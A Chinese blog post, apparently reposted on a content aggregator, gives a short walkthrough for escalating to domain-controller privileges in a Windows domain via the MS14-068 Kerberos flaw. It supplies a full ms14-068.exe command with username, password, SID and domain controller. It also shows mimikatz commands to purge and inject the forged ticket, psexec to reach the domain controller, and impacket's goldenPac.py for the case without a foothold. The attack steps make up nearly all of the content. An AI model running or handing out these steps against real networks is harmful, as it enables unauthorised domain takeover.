MS14-068提权和impacket工具包提权 - 走看看

zoukankan html css js c++ java

MS14-068提权和impacket工具包提权

ms14-068提权
工具利用
a)拿下边界机win7，并已经有win7上任意一个账号的密码
-u 用户名@域
-p 用户密码
-s 用户sid
-d 域控
ms14-068.exe -u test3@superman.com -p Test#123 -s S-1-5-21-2030659959-700672918-1434258406-1113 -d win08.superman.com
生成一个ccache后缀票据
导入票据
导入之前，清空票据缓存
kerberos::purge
kerberos::ptc 票据
使用psexec工具连接win08（域控机器）尝试执行命令，看到的权限是test3的，但是实际上所属已经是win08上，并且是最高权限
impacket工具包提权
b) 没拿到边界机，但是有账号密码的情况
使用/impacket/examples下的goldenpac.py脚本
注意@domain-host 指的是域控机的位置
成功进入win08的命令行模式

查看全文

相关阅读:
[Bug] .NET 2.0 的Bug —— ComboBox中不能添加Component.
[WPF]WPF中如何实现数据与表示分离。（一） —— XAML
我有2个Windows Live Messenger的邀请。
Avalon学习笔记之路由事件
 [FxCop.设计规则]10. 类型应该被声明在命名空间中
 Avalon学习笔记（二）——从属属性和附加属性
 Longhorn将集成RSS支持。
[WinFX]WinFX 12月份CTP发布，其中包含了XAML设计器
 [FxCop.设计规则]9. 事件句柄声明不恰当
 对于最近一段时间热门的新技术的感想

原文地址：https://www.cnblogs.com/sup3rman/p/12329854.html

Copyright © 2011-2022 走看看